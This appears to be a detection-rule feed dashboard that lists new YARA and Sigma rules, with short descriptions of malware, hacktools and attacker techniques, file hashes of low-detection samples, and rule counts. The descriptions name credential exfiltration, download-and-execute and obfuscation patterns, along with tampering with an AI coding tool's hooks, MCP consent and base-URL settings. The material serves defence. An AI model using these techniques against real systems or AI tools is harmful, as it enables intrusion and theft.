currently serving 23766 YARA rules and 4457 Sigma rules
API Key
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
MAL_Kernel_RegPhantom_Mar26
Detects RegPhantom, a kernel-mode rootkit that allow attacker to inject arbitrary code from unprivileged user-mode into kernel-mode and execute it.
19.03.2026
MAL_LNK_File_With_PE_Content_Mar26
Detects Windows shortcut (.lnk) files that contain portable executable (PE) content, indicating possible malware delivery.
12.03.2026
MAL_MacOS_Shub_Stealer_Mar26
Detects Shub stealer that harvests browser cookies, keychain items, and file metadata, encodes data in Base64, and exfiltrates to a remote C2 server via HTTP POST requests
11.03.2026
MAL_FireRain_RAT_Mar26
Detects FireRain RAT written in Go that uses KCP-over-UDP encrypted C2 with remote desktop, hidden shell, file transfer, and Startup folder hijack persistence
10.03.2026
SUSP_ControlFlow_Obfuscation_Mar26
Detects control flow obfuscation with opaque predicates commonly used in malware such as Silver Dragon
10.03.2026
MAL_Bibi_Wiper_Mar26
Detects BibiWiper that encrypts files, overwrites disk with random data, and destroys the MBR to render systems unbootable
09.03.2026
SUSP_MacOS_AppleScript_Curl_Command_Mar26
Detects suspicious macOS AppleScript code executing curl via 'do shell script', often used by malware to retrieve remote C2 domains or payloads.
09.03.2026
HKTL_Flashingestor_Mar26
Detects flashingestor, a Go based hacktool for Active Directory collection
09.03.2026
SUSP_OBFUSC_Base64_WAR_Mar26
Detects base64 encoded WAR files, which is unusual and could be part of a POC or attack where the WAR (usually a web shell) file is being obfuscated to evade detection. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
08.03.2026
SUSP_PS1_Loader_Mar26
Detects obfuscated PowerShell execution via invoke-Expression with nested parentheses, web content retrieval using UseBasicParsing with string replacement for payload reconstruction, and base64-encoded JavaScript
06.03.2026
MAL_OBFUSC_VBS_Script_Mar26
Detects an obfuscated VBS script seen being used to deliver deliver and execute other payloads
05.03.2026
MAL_PY_Stealer_Mar26
Detects a Python-based browser credential and credit card infostealer targeting browsers and decrypts saved passwords and credit card data and exfiltrates to a remote C2 server
05.03.2026
MAL_Moonrise_RAT_Mar26
Detects MoonRise RAT which is a remote access trojan that provides attackers with unauthorized access and control over infected systems, often used for espionage, data theft, and other malicious activities.
05.03.2026
MAL_NET_Force_BSOD_Mar26
Detects code that deliberately triggers a Windows Blue Screen of Death (BSOD) by forcing a system crash. Malicious actors use this technique to disrupt operations or temporarily render the victim system unusable.
03.03.2026
SUSP_Claude_Config_File_Mar26
Detects untrusted project hooks and MCP user consent bypass in Claude configuration files
03.03.2026
SUSP_Claude_Env_Overwrite_Mar26
Detects suspicious overwrite of environment variable ANTHROPIC_BASE_URL
03.03.2026
MAL_NET_Excessive_Anti_Analysis_Mar26
Detects excessive anti analysis functions found in commodity malware.
03.03.2026
MAL_DPRK_RAT_Mar26
Detects a DPRK RAT which makes basic system reconnaissance and uses execution status messages such as file existence checks and host identification
02.03.2026
MAL_MuddyWater_Downloader_Mar26
Detects a downloader that communicates over HTTPS to register infected hosts, poll for operator approval, and stage disguised payloads
02.03.2026
HKTL_KVC_Mar26
Detects KVC, a hacktool which enables unsigned driver loading via DSE bypass and PP/PPL manipulation for LSASS memory dumping on modern Windows with HVCI/VBS
02.03.2026
WEBSHELL_CSHTML_Mar26
Detects CSHTML based webshells
02.03.2026
HKTL_ADCSDevilCOM_Mar26
Detects ADCSDevilCOM, a hacktool for requesting certificates from ADCS using DCOM over SMB.
02.03.2026
MAL_NET_Quasar_Multi_Mar26
Detects QuasarRAT and derivative implementations like AsyncRAT. Quasar features full remote access, persitence and data exfiltration capabilities.
01.03.2026
MAL_Prometei_NetDefender_Module_Feb26
Detects Prometei RDP lockout module - subscribes to failed login events (4625) and blocks repeat offenders via Windows Firewall to maintain exclusive access to compromised hosts.
28.02.2026
MAL_Prometei_Botnet_Encrypted_Main_Module_Feb26
Detects the main module of Prometei botnet, that decrypts itself on memory and is responsible for the core functionalities of the botnet, including command and control communication, payload management, and execution of malicious activities on infected systems.
27.02.2026
MAL_Prometei_Botnet_Linux_Variant_Feb26
Detects a Linux variant of the Prometei botnet, which is a sophisticated malware family that targets both Windows and Linux systems
27.02.2026
HKTL_Go_Golinhound_Feb26
Detects Golinhound, a Go-based tool designed for reconnaissance and information gathering on Linux systems, which can be used by attackers to collect system information, network details, and other sensitive data for further exploitation or lateral movement
27.02.2026
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_NET_Shellcode_Loader_Indicators_Jan24
12
6aaa0ec19b1ff4e5943116600f8ae24184621c0dac03c36dba209e685e77f435
PUA_ConnectWise_ScreenConnect_Mar23
10
4a8da02e81c7dcd2b6e4f868e784821a0eb04a5733ff16fcc38803b62b18078d
SUSP_EXPL_ShellCode_Loader_Nov22_1
7
8bf173be47eff0fd4041f0158088e577b3937fc83801d36dca88639d8a1a6eb3
SUSP_Credential_Stealer_Indicators_Jul23_1
4
f42a5ca13caf7ee5b2b4fba059c54585f5cf13e84357ec70026c2f5dcf664533
SUSP_Credential_Stealer_Indicators_Jul23_2
4
f42a5ca13caf7ee5b2b4fba059c54585f5cf13e84357ec70026c2f5dcf664533
SUSP_HKTL_Hacktool_Strings_Oct21_1
10
af61d8718c433c00f95519f000fe3e73cf9abcef7a1d494f9567a5efaa8b4e81
SUSP_HKTL_CobaltStrike_PS1_Loader_Indicator_Nov23_2
8
4732451eee9a1cbb9dfc70c41f416df4a89733f6690979d1696ac6a5e767e524
PUA_ConnectWise_ScreenConnect_Mar23
13
d0ee1f0af48ba70c173f1e7bdff15ef43aa4292af9f4fa559e10f4f72f0a1c09
SUSP_PS1_IEX_From_Download_Dec22_1
2
73c1a09c851a8e7cd91d4de71e5017c9507002ef82ee740b8a1304565bf4399b
WEBSHELL_PHP_BeginsWith_eval_Sep21
2
713d45b69459381a19a618629f28de8d524f3cbe3ca6468bd011d95bbb6bb1ad
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7515
Threat Hunting (not subscribable, only in THOR scanner)
5822
APT
5054
Hacktools
4834
Webshells
2400
Exploits
722
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
Netsh Advfirewall Isolate Network
Detects execution of netsh.exe commands that modify Windows Advanced Firewall settings to block both inbound and outbound traffic, effectively isolating the system from network communication. This technique may be used by attackers to evade detection, prevent remediation, or disrupt incident response activities.
20.02.2026
ICACLS Deny Permission Abuse
Detects execution of icacls.exe with deny arguments targeting broad principals such as Everyone or Administrators, which may indicate malicious permission tampering.
20.02.2026
Suspicious Child Processes Spawned by AnyDesk
Detects suspicious child processes spawned by AnyDesk process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Chrome Remote Desktop
Detects suspicious child processes spawned by Chrome Remote Desktop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by LogMeIn
Detects suspicious child processes spawned by LogMeIn process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by RemotePC
Detects suspicious child processes spawned by RemotePC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by ScreenConnect
Detects suspicious child processes spawned by ScreenConnect process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by SlashTop
Detects suspicious child processes spawned by SlashTop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Splashtop
Detects suspicious child processes spawned by Splashtop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by TightVNC
Detects suspicious child processes spawned by TightVNC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by TeamViewer
Detects suspicious child processes spawned by TeamViewer process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by UltraVNC
Detects suspicious child processes spawned by UltraVNC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by VNCConnect
Detects suspicious child processes spawned by VNCConnect process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by ZohoAssist
Detects suspicious child processes spawned by ZohoAssist process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by AeroAdmin
Detects suspicious child processes spawned by AeroAdmin process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by AMMYYAdmin
Detects suspicious child processes spawned by AMMYYAdmin process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Remote Utilities
Detects suspicious child processes spawned by Remote Utilities process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
File Operation via .NET Class
Detects the use of dotnet method in command lines which could be used for unauthorized file operations such as copying files.
It could indicate suspicious activity because there are many normal ways to copy files in Windows, thus adversary may use this rarely used method to avoid detection.
06.02.2026
Suspicious Double Extension Files in Linux
Detects files with double extensions in Linux systems, which could be an attempt to disguise executable content as harmless documents.
05.02.2026
Suspicious Linux Command Patterns
Detects suspicious command line patterns that may indicate malicious activity such as decoding base64 content to files in some folder and executing it.
05.02.2026
Suspicious Double Extension File Execution on Linux
Detects suspicious use of executable extensions like .sh, .py or .pl after a non-executable file extension to disguise malicious files in Linux environments
05.02.2026
Suspicious Download and Execution Combo in Linux
Detect suspicious command line patterns where a download command line utility is executed in combination with other suspicious command line utilities.
This could indicate potential malicious activity such as downloading and various other actions like decoding, changing permissions, or executing the downloaded file or creating persistence.
05.02.2026
Suspicious Base64 Encoded IP in PowerShell Execution
Detects PowerShell script blocks that contain base64-encoded IP addresses, a technique commonly used for obfuscation and defense evasion.
Threat actors may leverage this method to download and execute secondary payloads from IP addresses - often their command and control (C2) servers or other malicious infrastructure.
By encoding these URLs in base64 within PowerShell commands, adversaries attempt to bypass detection mechanisms and evade user scrutiny.
This rule helps identify suspicious activity where PowerShell is used to retrieve content from IPs via base64-encoded strings, which is rarely seen in legitimate software.
04.02.2026
Suspicious Base64 Encoded IP in Command Line
Detects processes with command lines containing base64-encoded IP addresses, which may indicate obfuscation or evasion attempts.
Threat actors often host their secondary malicious payloads on IP addresses, potentially their C&C servers or other hosting infrastructure.
To download these malicious payloads, the malware dropper technique involves downloading and executing a secondary payload from an IP address.
And to obscure the command line from normal user scrutiny, threat actors may their script or command line arguments in base64 encoding to download and execute the secondary payload.
04.02.2026
Uncommon File Created by Notepad++ Updater Gup.EXE
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.
This could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.
03.02.2026
Tiny C Compiler Runtime Execution
Detects execution of Tiny C Compiler (TCC) which compiles and executes C code directly in memory.
This technique was observed in Chrysalis backdoor campaigns where attackers renamed tcc.exe to svchost.exe and used it
to load shellcode from .c files directly into memory, bypassing traditional detection methods.
03.02.2026
Suspicious Child Process of Notepad++ Updater - GUP.Exe
Detects suspicious child process creation by the Notepad++ updater process (gup.exe).
This could indicate potential exploitation of the updater component to deliver unwanted malware.
03.02.2026
Renamed TinyCC (TCC) Compiler Execution
Detects the execution of a renamed TinyCC (TCC) Compiler (tcc.exe)
Attackers have been observed renaming tcc.exe to masquerade as legitimate Windows binaries (e.g., svchost.exe) to compile and execute malicious C code in memory, such as shellcode loaders.
This technique was observed in Chrysalis backdoor attacks.
03.02.2026
Reflective Loading from Masqueraded File - PowerShell
Detects a PowerShell scriptblock pattern where a masqueraded file (e.g., a .png) is read into a byte array and then reflectively loaded as a .NET assembly.
This technique is used by various threat actors to evade file-based detections.
02.02.2026
YARA/SIGMA Rule Count
Rule Type
Community Feed
Nextron Private Feed
Yara
2717
21049
Sigma
3540
917
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1331
windows / registry_set
219
windows / file_event
206
windows / ps_script
165
windows / security
160
linux / process_creation
131
windows / image_load
114
webserver
82
windows / system
74
macos / process_creation
68
aws / cloudtrail
55
proxy
54
linux / auditd
53
windows / network_connection
53
azure / activitylogs
42
windows / registry_event
40
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
27
windows / process_access
25
azure / signinlogs
24
okta / okta
22
azure / riskdetection
19
opencanary / application
18
windows / pipe_created
18
rpc_firewall / application
17
windows / windefend
16
github / audit
16
linux
16
gcp / gcp.audit
16
bitbucket / audit
14
windows / file_delete
13
linux / file_event
13
m365 / threat_management
13
cisco / aaa
12
windows / create_remote_thread
12
windows / driver_load
10
windows / registry_delete
10
kubernetes / application / audit
10
windows / codeintegrity-operational
10
windows / ps_classic_start
9
dns
9
windows / appxdeployment-server
9
windows / create_stream_hash
9
windows / firewall-as
8
windows / msexchange-management
8
antivirus
7
fortigate / event
7
windows / file_access
7
azure / pim
7
windows / bits-client
7
zeek / smb_files
7
gcp / google_workspace.admin
7
windows / dns-client
6
jvm / application
5
kubernetes / audit
5
zeek / dns
5
linux / network_connection
5
zeek / http
5
windows / taskscheduler
4
windows / iis-configuration
4
zeek / dce_rpc
4
windows / sysmon
4
windows / wmi_event
3
windows / powershell-classic
3
windows / ntlm
3
linux / sshd
3
windows / registry_add
3
m365 / audit
3
macos / file_event
3
spring / application
2
onelogin / onelogin.events
2
firewall
2
linux / syslog
2
windows / security-mitigations
2
windows / dns-server
2
apache
2
linux / sudo
1
velocity / application
1
cisco / duo
1
cisco / bgp
1
nginx
1
windows / dns-server-analytic
1
cisco / ldp
1
windows / ldap
1
windows / wmi
1
windows / printservice-admin
1
database
1
windows / ps_classic_provider_start
1
windows / printservice-operational
1
linux / guacamole
1
windows / lsa-server
1
django / application
1
linux / auth
1
linux / clamav
1
windows / appmodel-runtime
1
fortios / sslvpnd
1
linux / cron
1
juniper / bgp
1
windows / applocker
1
windows / openssh
1
cisco / syslog
1
huawei / bgp
1
windows / appxpackaging-om
1
windows / smbclient-connectivity
1
windows / smbserver-connectivity
1
windows / process_tampering
1
windows / raw_access_thread
1
paloalto / file_event / globalprotect
1
windows / capi2
1
windows / shell-core
1
windows / file_change
1
nodejs / application
1
paloalto / appliance / globalprotect
1
windows / certificateservicesclient-lifecycle-system
1
windows / microsoft-servicebus-client
1
linux / vsftpd
1
zeek / x509
1
windows / file_executable_detected
1
python / application
1
windows / diagnosis-scripted
1
windows / smbclient-security
1
m365 / exchange
1
zeek / rdp
1
windows / file_rename
1
windows / sysmon_error
1
ruby_on_rails / application
1
m365 / threat_detection
1
zeek / kerberos
1
windows / terminalservices-localsessionmanager
1
windows / sysmon_status
1
sql / application
1
windows / driver-framework
1
windows
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
441
windows / ps_script
83
windows / registry_set
83
windows / file_event
46
windows / image_load
46
linux / process_creation
41
windows / wmi
29
windows / security
25
proxy
12
windows / system
11
windows / network_connection
8
windows / registry_event
8
windows / kernel-event-tracing
6
windows / ntfs
5
windows / ps_module
5
windows / pipe_created
4
windows / sense
4
windows / taskscheduler
4
windows / create_remote_thread
4
windows / registry_delete
4
windows / hyper-v-worker
3
windows / ps_classic_script
3
webserver
3
windows / vhd
3
windows / application-experience
3
windows / driver_load
3
windows / codeintegrity-operational
2
windows / file_delete
2
windows / kernel-shimengine
2
linux / file_event
2
macos / process_creation
2
windows / windefend
2
windows / process_access
2
windows / process-creation
2
windows / bits-client
2
windows / dns_query
2
windows / file_access
2
windows / registry-setinformation
1
windows / file_rename
1
windows / firewall-as
1
dns
1
windows / application
1
windows / amsi
1
windows / registry_add
1
windows / audit-cve
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Carbon Black
Tutorial: https://github.com/carbonblack/cb-yara-connectorFireEye EX
Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html
Scan your endpoints, forensic images or collected files with our portable scanner THOR